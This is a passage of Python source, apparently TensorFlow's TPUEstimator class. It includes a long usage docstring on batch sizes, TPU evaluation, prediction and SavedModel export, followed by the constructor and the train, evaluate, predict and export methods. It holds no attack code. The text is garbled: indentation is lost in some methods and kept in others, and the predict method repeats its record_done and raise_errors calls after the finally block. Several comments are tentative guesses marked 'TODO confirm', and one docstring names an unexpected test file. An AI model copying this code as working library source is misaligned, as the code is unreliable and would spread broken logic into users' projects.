TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
  def __init__(self,
               model_fn=None,
               model_dir=None,
               config=None,
               params=None,
               use_tpu=True,
               train_batch_size=None,
               eval_batch_size=None,
               predict_batch_size=None,
               batch_axis=None,
               eval_on_tpu=True,
               export_to_tpu=True,
               export_to_cpu=True,
               warm_start_from=None,
               embedding_config_spec=None,
               export_saved_model_api_version=ExportSavedModelApiVersion.V1):
    """Constructs a `TPUEstimator` instance.

    Args:
      model_fn: Model function as required by `Estimator` which returns
        EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
        and `prediction_hooks` must not capture any TPU Tensor inside the
        model_fn.
      model_dir: Directory to save model parameters, graph and etc. This can
        also be used to load checkpoints from the directory into an estimator
        to continue training a previously saved model. If `None`, the model_dir
        in `config` will be used if set. If both are set, they must be same. If
        both are `None`, a temporary directory will be used.
      config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
      params: An optional `dict` of hyper parameters that will be passed into
        `input_fn` and `model_fn`. Keys are names of parameters, values are
        basic python types. There are reserved keys for `TPUEstimator`,
        including 'batch_size'.
      use_tpu: A bool indicating whether TPU support is enabled. Currently, -
        TPU training and evaluation respect this bit, but eval_on_tpu can
        override execution of eval. See below. - Predict still happens on CPU.
      train_batch_size: An int representing the global training batch size.
        TPUEstimator transforms this global batch size to a per-shard batch
        size, as params['batch_size'], when calling `input_fn` and `model_fn`.
        Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
        number of replicas.
      eval_batch_size: An int representing evaluation batch size. Must be
        divisible by total number of replicas.
      predict_batch_size: An int representing the prediction batch size. Must
        be divisible by total number of replicas.
      batch_axis: A python tuple of int values describing how each tensor
        produced by the Estimator `input_fn` should be split across the TPU
        compute shards. For example, if your input_fn produced (images, labels)
        where the images tensor is in `HWCN` format, your shard dimensions would
        be [3, 0], where 3 corresponds to the `N` dimension of your images
        Tensor, and 0 corresponds to the dimension along which to split the
        labels to match up with the corresponding images. If None is supplied,
        and per_host_input_for_training is True, batches will be sharded based
        on the major dimension. If tpu_config.per_host_input_for_training is
        False or `PER_HOST_V2`, batch_axis is ignored.
      eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
        model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
      export_to_tpu: If True, `export_saved_model()` exports a metagraph for
        serving on TPU. Note that unsupported export modes such as EVAL will be
        ignored. For those modes, only a CPU model will be exported.
        Currently, export_to_tpu only supports PREDICT.
      export_to_cpu: If True, `export_saved_model()` exports a metagraph for
        serving on CPU.
      warm_start_from: Optional string filepath to a checkpoint or SavedModel
        to warm-start from, or a `tf.estimator.WarmStartSettings` object to
        fully configure warm-starting. If the string filepath is provided
        instead of a `WarmStartSettings`, then all variables are warm-started,
        and it is assumed that vocabularies and Tensor names are unchanged.
      embedding_config_spec: Optional EmbeddingConfigSpec instance to support
        using TPU embedding.
      export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
        With V1, `export_saved_model()` adds rewrite() and
        TPUPartitionedCallOp() for user; while in v2, user is expected to add
        rewrite(), TPUPartitionedCallOp() etc in their model_fn. A helper
        function `inference_on_tpu` is provided for V2.
        brn_tpu_estimator.py includes examples for both versions
        i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.

    Raises:
      ValueError: `params` has reserved keys already.
    """
    if config is None or not isinstance(config, tpu_config.RunConfig):
      raise ValueError(
          '`config` must be provided with type `tpu_config.RunConfig`')

    if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
      raise ValueError('{} are reserved keys but existed in params {}.'.format(
          _RESERVED_PARAMS_KEYS, params))

    if use_tpu:
      # Perform some very basic validations. More validations will be found in
      # _InternalTPUContext.
      if train_batch_size is None:
        raise ValueError('`train_batch_size` cannot be `None`')
      util_lib.check_positive_integer(train_batch_size, 'train_batch_size')

      if (config.tpu_config.per_host_input_for_training is
          tpu_config.InputPipelineConfig.PER_SHARD_V1 and
          config.tpu_config.num_cores_per_replica):
        raise ValueError(
            'Model parallelism only supports per host input for training. '
            'Please adjust TPURunconfig.per_host_input_for_training.')

      if eval_batch_size is not None:
        util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')

      if predict_batch_size is not None:
        util_lib.check_positive_integer(predict_batch_size,
                                        'predict_batch_size')

      if embedding_config_spec:
        if (config.tpu_config.per_host_input_for_training !=
            tpu_config.InputPipelineConfig.PER_HOST_V2):
          raise ValueError('Only PER_HOST_V2 is supported when using TPU '
                           'Embedding; got {}.'.format(
                               config.tpu_config.per_host_input_for_training))
        # Tracks whether embeddings come from feature columns (vs. explicit
        # table configs); read later by the embedding integration code.
        self._embedding_from_feature_columns = (
            embedding_config_spec.feature_columns is not None)

    if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
        embedding_config_spec.partition_strategy == 'mod'):
      raise ValueError('Mod sharding of embedding tables not supported on '
                       'CPU.')

    # Verifies the model_fn signature according to Estimator framework.
    estimator_lib._verify_model_fn_args(model_fn, params)  # pylint: disable=protected-access
    # We cannot store config and params in this constructor as parent
    # constructor might change them, such as assigning a temp dir for
    # config.model_dir.
    model_function = self._augment_model_fn(model_fn, batch_axis)

    # Overwrite log_step_count_steps to disable TensorLoggingHook and
    # StepCounterHook from being created in Estimator. TPUEstimator already
    # added equivalent hooks in _augment_model_fn above.
    self._log_every_n_steps = config.log_step_count_steps
    config = config.replace(log_step_count_steps=None)

    # Passing non-None params as wrapped model_fn has it.
    params = params or {}
    super(TPUEstimator, self).__init__(
        model_fn=model_function,
        model_dir=model_dir,
        config=config,
        params=params,
        warm_start_from=warm_start_from)
    self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
        self._config.tpu_config.iterations_per_loop)
    # In absence of an explicit `log_every_n_secs` config, if the
    # `iterations_per_loop` value is specified as time in seconds, enable
    # logging every n secs based on the `iterations_per_loop` value. A trade-off
    # avoiding API change on the current release.
    # TODO(henrytan): add `log_every_n_secs` to RunConfig.
    if self._iterations_per_training_loop.unit == 'seconds':
      self._log_every_n_secs = self._iterations_per_training_loop.value
      self._log_every_n_steps = None
    elif self._iterations_per_training_loop.unit == 'count':
      if self._log_every_n_steps is not None:
        # Each session.run() lasts for iterations_per_loop. We can't log
        # in-between a session.run(), and we can only log after the
        # `iterations_per_loop` steps, so we can only approximate. If a user
        # requests to log every N steps, we actually want to roughly log every
        # N / `iterations_per_loop` steps to match the original intention.
        self._log_every_n_steps = (
            int(math.ceil(float(self._log_every_n_steps) /
                          self._iterations_per_training_loop.value)))
      self._log_every_n_secs = None
    else:
      assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
                     'Indicates a bug in `iterations_per_loop` '
                     'parsing.')

    # All properties passed to _InternalTPUContext are immutable.
    # pylint: disable=protected-access
    self._ctx = tpu_context._get_tpu_context(
        self._config, train_batch_size, eval_batch_size, predict_batch_size,
        use_tpu, eval_on_tpu, embedding_config_spec)

    self._export_to_cpu = export_to_cpu
    self._export_to_tpu = export_to_tpu

    if not isinstance(export_saved_model_api_version,
                      ExportSavedModelApiVersion):
      raise ValueError('export_saved_model_api_version should be of type '
                       'ExportSavedModelApiVersion; got {}.'.format(
                           export_saved_model_api_version))
    self._export_saved_model_api_version = export_saved_model_api_version
    # None means "input_fn has not been invoked yet"; set to True by
    # _call_input_fn and cleared by the wrapped model_fn.
    self._is_input_fn_invoked = None
    # Per-mode ErrorRendezvous instances, populated by train/evaluate/predict.
    self._rendezvous = {}
  def _add_meta_graph_for_mode(self,
                               builder,
                               input_receiver_fn_map,
                               checkpoint_path,
                               save_variables=True,
                               mode=model_fn_lib.ModeKeys.PREDICT,
                               export_tags=None,
                               check_variables=True,
                               strip_default_attrs=True):
    """Adds CPU and/or TPU metagraphs for `mode` to the SavedModel builder.

    Overrides the parent Estimator hook so that, in addition to the normal
    CPU metagraph, a second metagraph tagged SERVING+TPU can be written for
    PREDICT mode.
    """
    if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
      # TPU export only supports PREDICT; other modes fall back to CPU-only.
      logging.warning('TPUEstimator only handles mode PREDICT for exporting '
                      'when `export_to_tpu` is `True`; Mode {} will be ignored '
                      'for TPU.'.format(mode))

    if not self._export_to_cpu and not self._export_to_tpu:
      raise ValueError('One of export_to_cpu and export_to_tpu must be true.')

    if self._export_to_cpu:
      # Standard (CPU) metagraph via the parent implementation.
      (super(TPUEstimator, self)._add_meta_graph_for_mode(
          builder,
          input_receiver_fn_map,
          checkpoint_path,
          save_variables,
          mode=mode,
          export_tags=export_tags,
          check_variables=check_variables,
          strip_default_attrs=strip_default_attrs))

    if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
      # Re-key the receiver map onto the TPU inference pseudo-mode and tag
      # the second metagraph with both SERVING and TPU.
      input_receiver_fn_map = {
          _INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
      }
      export_tags = [tag_constants.SERVING, tag_constants.TPU]
      mode = _INFERENCE_ON_TPU_MODE

      # See b/110052256 for why `check_variables` is `False`.
      # Variables are saved/checked exactly once: by the CPU pass above if it
      # ran, otherwise by this TPU pass.
      if not self._export_to_cpu:
        check_variables = save_variables = True
      else:
        check_variables = save_variables = False

      (super(TPUEstimator, self)._add_meta_graph_for_mode(
          builder,
          input_receiver_fn_map,
          checkpoint_path,
          save_variables=save_variables,
          mode=mode,
          export_tags=export_tags,
          check_variables=check_variables,
          strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
if mode == _INFERENCE_ON_TPU_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
  def _call_model_fn_for_inference(self, features, labels, mode, config):
    """Wraps `_call_model_fn` for `export_saved_model`."""
    # Guard: this path is only valid for the TPU inference pseudo-mode set up
    # by _add_meta_graph_for_mode.
    if mode != _INFERENCE_ON_TPU_MODE:
      raise ValueError('mode must be {}; '
                       'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
    # batch_config=None: no batching op is wrapped around the computation
    # here — presumably callers wanting batching use inference_on_tpu with an
    # explicit BatchConfig; TODO confirm.
    return model_fn_inference_on_tpu(
        self._model_fn,
        features,
        labels,
        config,
        self._params,
        batch_config=None)
  def _create_global_step(self, graph):
    """Creates a global step suitable for TPUs.

    Delegates to the module-level `_create_global_step` helper instead of the
    parent Estimator implementation.

    Args:
      graph: The graph in which to create the global step.

    Returns:
      A global step `Tensor`.

    Raises:
      ValueError: if the global step tensor is already defined.
    """
    return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
  def _call_input_fn(self, input_fn, mode):
    """Calls the input function.

    Args:
      input_fn: The input function.
      mode: ModeKeys

    Returns:
      In TPU mode, returns an input_fn to be called later in model_fn.
      Otherwise, calls the input_fn and returns either features or
      (features, labels).

    Raises:
      ValueError: if input_fn takes invalid arguments or does not have `params`.
    """
    input_fn_args = function_utils.fn_args(input_fn)
    config = self.config  # a deep copy.
    kwargs = {}
    # `params` is mandatory so TPUEstimator can inject params['batch_size'].
    if 'params' in input_fn_args:
      kwargs['params'] = self.params  # a deep copy.
    else:
      raise ValueError('input_fn ({}) does not include params argument, '
                       'required by TPUEstimator to pass batch size as '
                       'params["batch_size"]'.format(input_fn))
    # `config` and `mode` are forwarded only if input_fn declares them.
    if 'config' in input_fn_args:
      kwargs['config'] = config

    if 'mode' in input_fn_args:
      kwargs['mode'] = mode

    # Records the fact input_fn has been invoked.
    self._is_input_fn_invoked = True

    with self._ctx.with_mode(mode) as ctx:
      if (ctx.is_running_on_cpu() and
          ctx.is_input_slice_broadcast_to_all_cores()):
        raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
                         ' value. SLICED mode only works on use_tpu = True.')
      # Setting the batch size in params first. This helps user to have same
      # input_fn for use_tpu=True/False.
      batch_size_for_input_fn = ctx.batch_size_for_input_fn
      if batch_size_for_input_fn is not None:
        _add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
                            batch_size_for_input_fn)

      # For export_saved_model, input_fn is never passed to Estimator. So,
      # `is_export_mode` must be False.
      if ctx.is_running_on_cpu(is_export_mode=False):
        with ops.device('/device:CPU:0'):
          return input_fn(**kwargs)

      # For TPU computation, input_fn should be invoked in a tf.while_loop for
      # performance. While constructing the tf.while_loop, the structure of
      # inputs returned by the `input_fn` needs to be recorded. The structure
      # includes whether features or labels is dict or single Tensor, dict keys,
      # tensor shapes, and dtypes. The recorded structure is used to create the
      # infeed dequeue ops, which must be wrapped and passed as a Fn, called
      # inside the TPU computation, as the TPU computation is wrapped inside a
      # tf.while_loop also. So, we either pass input_fn to model_fn or pass
      # dequeue_fn to model_fn. Here, `input_fn` is passed directly as
      # `features` in `model_fn` signature.
      def _input_fn(ctx):
        # Expose the (inner) TPU context to input_fn via params.
        _add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
        return input_fn(**kwargs)

      return _input_fn
  def _validate_features_in_predict_input(self, result):
    """Skip the validation.

    For TPUEstimator, we do not need to check the result type. `_InputPipeline`
    has stronger check. Parent class's check generates confusing warning msg.

    Args:
      result: `features` returned by input_fn.
    """
    # Intentionally a no-op override of the parent Estimator check.
    pass
  def train(self,
            input_fn,
            hooks=None,
            steps=None,
            max_steps=None,
            saving_listeners=None):
    """Wraps `Estimator.train` with TPU error-rendezvous handling."""
    # num_sources=3: errors may be reported from three places — presumably
    # the training loop plus the infeed/outfeed threads; TODO confirm which
    # sources register against this rendezvous.
    rendezvous = error_handling.ErrorRendezvous(num_sources=3)
    self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
    try:
      return super(TPUEstimator, self).train(
          input_fn=input_fn,
          hooks=hooks,
          steps=steps,
          max_steps=max_steps,
          saving_listeners=saving_listeners)
    except Exception:  # pylint: disable=broad-except
      # Record rather than re-raise: `raise_errors` in the finally clause
      # re-raises the most relevant error collected across all sources.
      rendezvous.record_error('training_loop', sys.exc_info())
    finally:
      rendezvous.record_done('training_loop')
      rendezvous.raise_errors()
  def evaluate(self,
               input_fn,
               steps=None,
               hooks=None,
               checkpoint_path=None,
               name=None):
    """Wraps `Estimator.evaluate` with TPU error-rendezvous handling."""
    # Same rendezvous pattern as `train`: collect errors from all sources and
    # re-raise the most relevant one in the finally clause.
    rendezvous = error_handling.ErrorRendezvous(num_sources=3)
    self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
    try:
      return super(TPUEstimator, self).evaluate(
          input_fn,
          steps=steps,
          hooks=hooks,
          checkpoint_path=checkpoint_path,
          name=name)
    except Exception:  # pylint: disable=broad-except
      # Record rather than re-raise; `raise_errors` below surfaces it.
      rendezvous.record_error('evaluation_loop', sys.exc_info())
    finally:
      rendezvous.record_done('evaluation_loop')
      rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
